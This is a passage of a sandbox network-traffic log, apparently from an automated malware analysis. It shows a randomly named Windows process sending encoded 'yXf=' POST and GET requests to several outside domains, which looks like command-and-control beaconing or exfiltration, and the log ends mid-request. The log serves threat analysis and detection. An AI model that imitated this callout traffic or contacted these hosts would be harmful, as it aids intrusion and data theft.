                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              6 | 192.168.2.11 | 49716 | 66.81.203.10 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:25:55.558121920 CEST | 796 | OUT | POST /osde/ HTTP/1.1
                              Host: www.mediaplug.biz
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 220
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.mediaplug.biz
                              Referer: http://www.mediaplug.biz/osde/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 32 57 7a 4d 76 2f 4d 6f 41 39 79 6e 46 30 58 6c 66 55 50 57 62 32 45 45 6f 31 50 65 5a 5a 5a 48 64 63 7a 38 50 4c 34 76 42 45 49 57 47 53 49 43 6a 35 71 67 46 46 52 49 55 32 76 42 4b 69 77 6b 5a 43 6d 76 7a 6d 71 54 37 42 6c 64 2f 52 38 36 4d 68 6b 38 62 4b 72 6b 57 78 66 43 32 2b 78 6e 79 4d 72 79 52 63 77 43 5a 4a 67 37 46 49 54 46 38 51 63 38 36 63 57 46 7a 42 6b 4b 6d 45 65 6d 63 63 4d 63 2b 79 46 34 66 72 63 2f 72 53 66 6e 58 50 55 46 77 54 52 64 79 51 53 4a 56 5a 33 35 54 2b 74 2f 58 68 5a 50 37 2b 64 65 34 3d
                              Data Ascii: yXf=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL2WzMv/MoA9ynF0XlfUPWb2EEo1PeZZZHdcz8PL4vBEIWGSICj5qgFFRIU2vBKiwkZCmvzmqT7Bld/R86Mhk8bKrkWxfC2+xnyMryRcwCZJg7FITF8Qc86cWFzBkKmEemccMc+yF4frc/rSfnXPUFwTRdyQSJVZ35T+t/XhZP7+de4=
                              Sep 11, 2024 14:25:56.138808012 CEST | 727 | IN | HTTP/1.1 405 Not Allowed
                              Server: nginx/1.14.2
                              Date: Wed, 11 Sep 2024 12:25:56 GMT
                              Content-Type: text/html
                              Content-Length: 575
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              7 | 192.168.2.11 | 49717 | 66.81.203.10 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:25:58.105159044 CEST | 1809 | OUT | POST /osde/ HTTP/1.1
                              Host: www.mediaplug.biz
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 1232
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.mediaplug.biz
                              Referer: http://www.mediaplug.biz/osde/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 2b 57 7a 36 37 2f 65 66 38 39 7a 6e 46 30 61 46 66 4a 50 57 62 72 45 48 59 78 50 65 55 73 5a 42 5a 63 68 4a 62 4c 78 2b 42 45 47 57 47 53 47 53 6a 34 6b 41 46 71 52 49 45 79 76 43 79 69 77 6b 5a 43 6d 74 48 6d 36 33 76 42 6e 64 2f 51 30 61 4d 74 67 38 61 6e 72 6b 4f 50 66 43 6a 4c 77 58 53 4d 71 57 39 63 32 77 78 4a 73 37 46 64 55 46 39 44 63 38 2b 39 57 46 2f 4e 6b 4c 53 2b 65 6b 4d 63 63 61 48 4e 42 4b 50 6e 48 65 48 42 64 46 72 78 51 56 34 72 4a 75 43 45 62 4a 39 79 33 70 53 6f 6c 76 71 72 42 4e 6a 76 4c 4a 6c 50 65 33 4c 32 56 63 5a 6b 4a 4c 61 59 64 34 32 39 65 44 7a 79 74 44 77 34 67 39 34 73 66 70 48 36 64 63 77 39 36 53 5a 74 37 55 71 4c 48 49 2b 43 57 6c 67 58 33 45 4b 50 5a 72 76 67 43 76 32 39 4f 54 4a 72 4c 57 58 4d 66 46 38 4d 66 65 50 51 48 6b 50 6e 6c 49 49 38 72 69 72 44 41 54 4e 66 30 4b 57 45 49 6d 39 6a 4d 4d 43 54 61 56 5a 39 66 74 78 53 4c 63 [TRUNCATED]
                              Data Ascii: yXf= [TRUNCATED]
                              Sep 11, 2024 14:25:58.679058075 CEST | 727 | IN | HTTP/1.1 405 Not Allowed
                              Server: nginx/1.14.2
                              Date: Wed, 11 Sep 2024 12:25:58 GMT
                              Content-Type: text/html
                              Content-Length: 575
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED]
                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              8 | 192.168.2.11 | 49718 | 66.81.203.10 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:26:00.652930975 CEST | 508 | OUT | GET /osde/?yXf=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sZHqZF0jtyzh4SZws5yKjtHhCwOPV3WXnk7o=&ndk=ctppWTth- HTTP/1.1
                              Host: www.mediaplug.biz
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-US
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Sep 11, 2024 14:26:01.474500895 CEST | 1236 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.14.2
                              Date: Wed, 11 Sep 2024 12:26:01 GMT
                              Content-Type: text/html
                              Content-Length: 1432
                              Last-Modified: Tue, 14 May 2024 12:20:23 GMT
                              Connection: close
                              ETag: "66435707-598"
                              Accept-Ranges: bytes
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 23 70 61 72 74 6e 65 72 2c 0d 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0d [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height: 100%; width: 100%; margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent; } /*body { overflow:hidden; }*/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div style="text-align: center;"> <p>This domain is pending renewal or has expired. Please contact the domain provider with questions.</p></div> <div id="partner"></div> <script type="text/j
                              Sep 11, 2024 14:26:01.474853039 CEST | 430 | IN | Data Raw: 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61
                              Data Ascii: avascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor22' + '/park.js?beforeBodyEndHTML


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              9 | 192.168.2.11 | 49719 | 103.42.108.46 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:26:06.846338987 CEST | 791 | OUT | POST /yl6y/ HTTP/1.1
                              Host: www.independent200.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 200
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.independent200.org
                              Referer: http://www.independent200.org/yl6y/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 34 2b 61 4e 46 42 6d 66 4b 2f 77 73 66 62 72 45 4d 38 41 4a 76 30 70 39 6b 2b 66 65 38 64 6e 33 5a 4e 37 68 54 64 52 43 61 73 31 33 57 4f 43 42 61 42 54 45 64 66 4d 44 65 59 41 4e 48 6e 56 39 76 6f 76 30 4a 70 42 4f 41 79 56 56 54 50 54 38 48 69 55 75 65 56 39 6f 56 32 44 50 51 50 6b 73 70 2b 30 47 44 72 66 63 61 54 56 4b 45 79 58 58 51 56 43 6b 67 77 71 6f 61 66 78 4e 6f 52 78 4c 57 54 6f 61 78 75 63 56 74 41 49 43 63 70 57 68 42 41 69 35 5a 62 35 54 34 65 4a 6f 6d 32 6a 6d 45 69 43 66 52 6a 33 5a 66 43 71 53 33 75 38 39 44 54 76 55 39 41 3d 3d
                              Data Ascii: yXf=dNiLasFHVsc44+aNFBmfK/wsfbrEM8AJv0p9k+fe8dn3ZN7hTdRCas13WOCBaBTEdfMDeYANHnV9vov0JpBOAyVVTPT8HiUueV9oV2DPQPksp+0GDrfcaTVKEyXXQVCkgwqoafxNoRxLWToaxucVtAICcpWhBAi5Zb5T4eJom2jmEiCfRj3ZfCqS3u89DTvU9A==
                              Sep 11, 2024 14:26:07.700239897 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                              Content-Type: text/plain; charset=utf-8
                              Date: Wed, 11 Sep 2024 12:26:07 GMT
                              Content-Length: 11
                              Connection: close
                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                              Data Ascii: Bad Request


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              10 | 192.168.2.11 | 49720 | 103.42.108.46 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:26:09.386543989 CEST | 811 | OUT | POST /yl6y/ HTTP/1.1
                              Host: www.independent200.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 220
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.independent200.org
                              Referer: http://www.independent200.org/yl6y/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 7a 33 5a 6f 2f 68 53 63 52 43 64 73 31 33 5a 75 44 4c 45 78 53 70 64 65 77 68 65 5a 4d 4e 48 6e 42 39 76 71 6e 30 4a 65 39 42 53 53 56 54 50 50 54 2b 59 79 55 75 65 56 39 6f 56 32 58 6c 51 50 73 73 70 4f 6b 47 43 50 72 44 5a 54 56 4a 54 43 58 58 62 31 43 67 67 77 72 39 61 65 39 6e 6f 53 4a 4c 57 53 30 61 78 36 49 4b 32 77 49 45 53 4a 58 4e 41 6a 62 69 63 62 38 64 77 2f 68 44 6c 54 48 36 4d 45 54 46 42 41 2b 4f 63 52 69 51 6a 49 64 4e 4b 69 4b 64 6d 45 79 59 4e 74 4e 71 2f 35 4d 70 56 33 45 38 76 6e 49 74 49 61 77 3d
                              Data Ascii: yXf=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vz3Zo/hScRCds13ZuDLExSpdewheZMNHnB9vqn0Je9BSSVTPPT+YyUueV9oV2XlQPsspOkGCPrDZTVJTCXXb1Cggwr9ae9noSJLWS0ax6IK2wIESJXNAjbicb8dw/hDlTH6METFBA+OcRiQjIdNKiKdmEyYNtNq/5MpV3E8vnItIaw=
                              Sep 11, 2024 14:26:10.257302046 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                              Content-Type: text/plain; charset=utf-8
                              Date: Wed, 11 Sep 2024 12:26:10 GMT
                              Content-Length: 11
                              Connection: close
                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                              Data Ascii: Bad Request


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              11 | 192.168.2.11 | 49721 | 103.42.108.46 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:26:11.942610979 CEST | 1824 | OUT | POST /yl6y/ HTTP/1.1
                              Host: www.independent200.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 1232
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.independent200.org
                              Referer: http://www.independent200.org/yl6y/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 72 33 59 61 33 68 51 2f 4a 43 63 73 31 33 48 2b 44 49 45 78 53 52 64 66 59 6c 65 5a 51 37 48 68 46 39 75 49 66 30 50 71 70 42 4c 69 56 54 58 50 54 7a 48 69 55 37 65 55 4e 57 56 32 48 6c 51 50 73 73 70 49 67 47 46 62 66 44 56 7a 56 4b 45 79 58 6c 51 56 43 59 67 30 2b 4b 61 65 70 64 6f 69 70 4c 57 32 55 61 2b 70 67 4b 72 41 49 38 56 4a 58 56 41 69 6e 48 63 62 77 6e 77 2f 46 6c 6c 56 33 36 4d 43 57 66 46 6a 4c 54 65 67 4b 50 2f 4c 51 6f 58 54 37 52 67 31 36 62 63 64 74 5a 6a 50 42 36 51 56 78 73 33 58 59 75 5a 66 61 2f 31 78 35 53 45 48 4e 4a 61 4f 46 71 73 4a 57 76 56 61 61 44 2f 52 30 57 70 46 63 4e 48 54 65 63 79 69 6c 4f 30 7a 41 38 32 5a 6d 48 68 6e 62 33 49 2b 6f 57 78 66 74 4d 72 54 4f 41 7a 32 32 66 32 30 7a 45 44 70 35 43 4c 39 74 37 31 53 41 68 4e 35 52 56 36 58 53 50 38 78 71 77 42 36 45 62 63 45 6d 76 4b 6f 48 52 6b 70 46 50 79 55 4d 73 59 32 4c 6f 43 45 [TRUNCATED]
                              Data Ascii: yXf= [TRUNCATED]
                              Sep 11, 2024 14:26:12.824970961 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                              Content-Type: text/plain; charset=utf-8
                              Date: Wed, 11 Sep 2024 12:26:12 GMT
                              Content-Length: 11
                              Connection: close
                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                              Data Ascii: Bad Request


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              12 | 192.168.2.11 | 49722 | 103.42.108.46 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:26:14.491461039 CEST | 513 | OUT | GET /yl6y/?yXf=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+TDdCZJ74ZBA3ZkRiMUCXQcAhgpMcC+j5S2A=&ndk=ctppWTth- HTTP/1.1
                              Host: www.independent200.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-US
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Sep 11, 2024 14:26:15.364213943 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                              Content-Type: text/plain; charset=utf-8
                              Date: Wed, 11 Sep 2024 12:26:15 GMT
                              Content-Length: 11
                              Connection: close
                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                              Data Ascii: Bad Request


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              13 | 192.168.2.11 | 49723 | 3.33.130.190 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:26:20.414041996 CEST | 788 | OUT | POST /06rp/ HTTP/1.1
                              Host: www.tigre777gg.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 200
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.tigre777gg.online
                              Referer: http://www.tigre777gg.online/06rp/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 76 35 67 56 72 6c 4e 6b 34 6b 67 42 49 39 62 79 75 53 76 46 61 46 6c 61 6c 76 6c 46 78 76 44 52 7a 54 52 5a 4b 42 69 31 69 2f 37 43 4c 6e 63 57 67 59 7a 4c 65 47 43 5a 43 7a 32 41 6d 64 6b 6a 6e 66 48 50 74 69 4e 55 55 51 31 2f 42 66 6a 6a 65 6e 4c 53 6e 66 4b 4d 55 4e 62 38 76 47 41 58 63 38 54 35 37 4a 64 36 33 54 41 44 53 31 2f 57 39 6d 56 37 6d 6d 76 64 4e 38 53 76 30 73 2b 68 75 44 66 67 44 6d 66 68 6d 6e 55 42 35 35 65 64 62 52 38 78 44 6b 34 44 34 6f 61 58 61 39 4b 77 6e 49 4a 63 64 68 7a 68 76 2b 56 57 75 52 72 65 77 4c 4c 79 51 3d 3d
                              Data Ascii: yXf=+gx9o4ylIYGL+v5gVrlNk4kgBI9byuSvFaFlalvlFxvDRzTRZKBi1i/7CLncWgYzLeGCZCz2AmdkjnfHPtiNUUQ1/BfjjenLSnfKMUNb8vGAXc8T57Jd63TADS1/W9mV7mmvdN8Sv0s+huDfgDmfhmnUB55edbR8xDk4D4oaXa9KwnIJcdhzhv+VWuRrewLLyQ==


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              14 | 192.168.2.11 | 49724 | 3.33.130.190 | 80 | 4884 | C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Sep 11, 2024 14:26:22.973388910 CEST | 808 | OUT | POST /06rp/ HTTP/1.1
                              Host: www.tigre777gg.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 220
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.tigre777gg.online
